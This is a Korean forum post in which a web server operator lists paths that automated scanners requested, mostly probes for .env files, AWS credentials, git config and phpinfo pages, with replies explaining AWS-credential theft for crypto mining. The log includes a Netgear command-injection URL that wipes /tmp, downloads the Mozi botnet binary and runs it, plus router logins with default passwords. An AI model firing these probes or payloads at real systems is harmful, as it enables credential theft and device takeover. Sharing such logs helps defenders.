... 아니, 새로 도메인 파서 올라온 건데, 누가 이걸 알고 이렇게 날리는 거죠... 일단 웹서버로 가동중이거든요. vue3 돌립니다.
보내 봤자 우리 아는 패턴 빼놓고는 다 404로 답해드릴 뿐인데 말이죠.
웹의 대부분의 신호들은 그냥 의미 없는 것들인 걸까 하는 생각이 들었습니다. 자원 낭비들인 것도 같고요.
도대체 우리 서버에서 뭘 알고 싶은 걸까요. 거참.
혹시 모르니 crul로 패턴 다 넣어서, 혹시 의미 있는 자료가 뽑히나 테스트 해볼라구요.
/__Additional
/_static/.env
/.aws/config
/.aws/credentials
/.docker/.env
/.env
/.env_1
/.env_sample
/.env.%7B%7BDN%7D%7D
/.env.%7B%7BSD%7D%7D
/.env.backup
/.env.dev
/.env.example
/.env.local
/.env.php
/.env.prod
/.env.production.local
/.env.save
/.env.stage
/.env.test
/.env.www
/.git/config
/.git/HEAD
/ab2g
/ab2h
/actions-server/.env
/actuator/health
/admin-app/.env
/admin.asp
/admin.aspx
/admin.cfm
/admin.cgi
/admin.html
/admin.jhtml
/admin.jsa
/admin.jsp
/admin.php
/admin.pl
/admin.shtml
/admin/.env
/admin/info.php
/admin/phpinfo
/admin/phpinfo.php
/adminer/.env
/administrator/.env
/administrator/info.php
/administrator/phpinfo.php
/agora/.env
/alpha/.env
/anaconda/.env
/apache.php
/api/.env
/api/src/.env
/api/v0/id
/api/v1/time
/api/v1/timestamp
/api/v2/static/not.found
/apis/apps/v1/namespaces/kube-system/daemonsets
/app_dir/.env
/app/.env
/app/client/.env
/app/config/.env
/app/config/dev/.env
/app/frontend/.env
/apps/.env
/apps/client/.env
/Archipel/.env
/asset_img/.env
/assets/.env
/audio/.env
/aws/credentials
/awstats/.env
/back/.env
/backend/.env
/backend/src/.env
/backendfinaltest/.env
/backup/.env
/base_dir/.env
/base.asp
/base.aspx
/base.cfm
/base.cgi
/base.html
/base.inc
/base.jhtml
/base.jsa
/base.jsp
/base.php
/base.pl
/base.shtml
/basic-network/.env
/bgoldd/.env
/bitcoind/.env
/blankon/.env
/blob/.env
/blog/.env
/blue/.env
/boaform/admin/formLogin?username=adminisp&psd=adminisp
/boaform/admin/formLogin?username=ec8&psd=ec8
/bookchain-client/.env
/bootstrap/.env
/bucoffea/.env
/build/.env
/c/version.js
/cardea/backend/.env
/cdw-backend/.env
/cgi-bin/.env
/challenge/.env
/challenges/.env
/charts/liveObjects/.env
/chat-client/.env
/chiminey/.env
/client-app/.env
/client/.env
/client/src/.env
/ClientApp/.env
/clld_dir/.env
/collected_static/.env
/community/.env
/conf/.env
/config/.env
/config/getuser?index=0
/console/info.php
/console/phpinfo.php
/ContainerRegistry/.env
/content/.env
/core/.env
/core/app/.env
/core/Datavase/.env
/core/persistence/.env
/counterblockd/.env
/counterwallet/.env
/cp/.env
/credentials
/cron/.env
/cronlab/.env
/cryo_project/.env
/css/.env
/CSS/Miniweb.css
/custom/.env
/d/.env
/dashboard/info.php
/dashboard/phpinfo.php
/dashboard/test.php
/data/.env
/database/.env
/dataset/.env
/default.asp
/default.aspx
/default.cfm
/default.cgi
/default.html
/default.jhtml
/default.jsa
/default.jsp
/default.php
/default.pl
/default.shtml
/default/.env
/delivery/.env
/demo-app/.env
/demo/.env
/deploy/.env
/dev.php
/developerslv/.env
/development/.env
/directories/.env
/doc/.env
/docker/.env
/docs/.env
/docs/cplugError.html/
/dodoswap-client/.env
/dotfiles/.env
/download/.env
/downloads/.env
/e2e/.env
/e5jX
/en/.env
/engine/.env
/env/.env
/epa/scripts/win/nsepa_setup.exe
/example/.env
/export/.env
/fastlane/.env
/favicons/.env
/favs/.env
/fedex/.env
/fhir-api/.env
/files/.env
/fileserver/.env
/films/.env
/flu/403.html
/fm/.env
/font-icons/.env
/fonts/.env
/foo.php
/forum/info.php
/forum/phpinfo.php
/frontend/.env
/frontendfinaltest/.env
/ftp/.env
/ftpmaster/.env
/gbook.html
/GponForm/diag_Form?images/
/grems-api/.env
/grems-frontend/.env
/Hash/.env
/hasura/.env
/Helmetjs/.env
/hgs-static/.env
/higlass-website/.env
/home.asp
/home.aspx
/home.cfm
/home.cgi
/home.html
/home.jhtml
/home.jsa
/home.jsp
/home.php
/home.pl
/home.shtml
/home/.env
/horde/.env
/hotpot-app-frontend/.env
/htdocs/.env
/html/.env
/http/.env
/httpboot/.env
/i.php
/icon/.env
/icons/.env
/ikiwiki/.env
/image_data/.env
/Imagebord/.env
/images/.env
/img/.env
/in.php
/index.asp
/index.aspx
/index.cfm
/index.cgi
/index.jhtml
/index.jsa
/index.jsp
/index.php
/index.pl
/index.shtml
/index1.php
/indice.asp
/indice.aspx
/indice.cfm
/indice.cgi
/indice.html
/indice.jhtml
/indice.jsa
/indice.jsp
/indice.php
/indice.pl
/indice.shtml
/inf.php
/info.php
/info1.php
/info2.php
/info3.php
/info4.php
/infophp.php
/infophp/index.php
/infophp/testphp.php
/infos.php
/ini.php
/inicio.asp
/inicio.aspx
/inicio.cfm
/inicio.cgi
/inicio.html
/inicio.jhtml
/inicio.jsa
/inicio.jsp
/inicio.php
/inicio.pl
/inicio.shtml
/install/.env
/items/.env
/javascript/.env
/js-plugin/.env
/js/.env
/json/
/jsrelay/.env
/jupyter/.env
/khanlinks/.env
/kibana/.env
/kodenames-server/.env
/kolab-syncroton/.env
/Kubernetes/.env
/lab/.env
/laravel/.env
/latest/.env
/layout/.env
/leafer-app/.env
/ledger_sync/.env
/lemonldap-ng-doc/.env
/lemonldap-ng-fr-doc/.env
/letsencrypt/.env
/lib/.env
/Library/.env
/libs/.env
/linear-swap-ex/market/depth?contract_code=BTC-USDT&type=step0
/linear-swap-ws
/linux/.env
/local/.env
/localstart.asp
/localstart.aspx
/localstart.cfm
/localstart.cgi
/localstart.html
/localstart.jhtml
/localstart.jsa
/localstart.jsp
/localstart.php
/localstart.pl
/localstart.shtml
/log/.env
/logging/.env
/login/.env
/mail/.env
/mailinabox/.env
/mailman/.env
/main_user/.env
/main.asp
/main.aspx
/main.cfm
/main.cgi
/main.html
/main.jhtml
/main.jsa
/main.jsp
/main.php
/main.pl
/main.shtml
/main/.env
/manual/.env
/master/.env
/media/.env
/memcached/.env
/menu.asp
/menu.aspx
/menu.cfm
/menu.cgi
/menu.html
/menu.jhtml
/menu.jsa
/menu.jsp
/menu.php
/menu.pl
/menu.shtml
/metrics
/micro-app-react/.env
/minified/.env
/misc/.env
/Modix/ClientApp/.env
/monerod/.env
/moodledata/.env
/msks/.env
/munki_repo/.env
/music/.env
/name/.env
/new-js/.env
/news-app/.env
/nginx-server/.env
/nginx/.env
/niffler-frontend/.env
/Nmap/folder/check1677652215
/nmaplowercheck1677652215
/NmapUpperCheck1677652215
/node_modules/.env
/noVNC/.env
/o.php
/oldsanta/.env
/ops/vagrant/.env
/option/.env
/orientdb-client/.env
/outputs/.env
/owa/auth/logon.aspx
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/owncloud/.env
/p.php
/php_info.php
/php-info.php
/php.ini
/php.php
/php/phpinfo.php
/php1.php
/phpinfo
/phpinfo.html
/phpinfo.php
/phpinfo.txt
/phpinfo/info.php
/phpinfo/phpinfo.php
/phpinfo1.php
/phpinfo2.php
/phpinfo3.php
/phpinfos.php
/phptest.php
/pinfo.php
/Portal/Portal.mwsl
/Portal0000.htm
/readme.txt
/ReportServer
/rest.php
/robots.txt
/root/info.php
/root/phpinfo.php
/scripts/index.php
/scripts/info.php
/scripts/phpinfo.php
/scripts/WPnBr.dll
/sdk
/setting_departmentxxx
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
/sitemap.xml
/stalker_portal/c/version.js
/start.asp
/start.aspx
/start.cfm
/start.cgi
/start.html
/start.jhtml
/start.jsa
/start.jsp
/start.php
/start.pl
/start.shtml
/stream?streams=btcusdt@depth
/stream/live.php
/streaming/clients_live.php
/system_api.php
/t4
/temp.php
/test.php
/test1.php
/test2.php
/test3.php
/test4.php
/testphp.php
/token.php
/v2/
/web/.env
/ws-api/v3
저런식으로 해서 aws credential 탈취해서.. gpu 인스턴스 만들어서 채굴합니다.. ㄷㄷㄷ
당사자는 요금 폭탄 맞구요..
그거 소홀히 하다 생기는 사고는 아마존이 책임지지 않습니다. 원칙적으로는요... ^^
/일본 왜노자
개발자 리소스 접근 권한 한정이야기죠. 해킹의 주목적이 aws리소스 털어먹기라서요.
집에 NAS돌려도 엄청 시도가 들어옵니다. ㅎㅎㅎ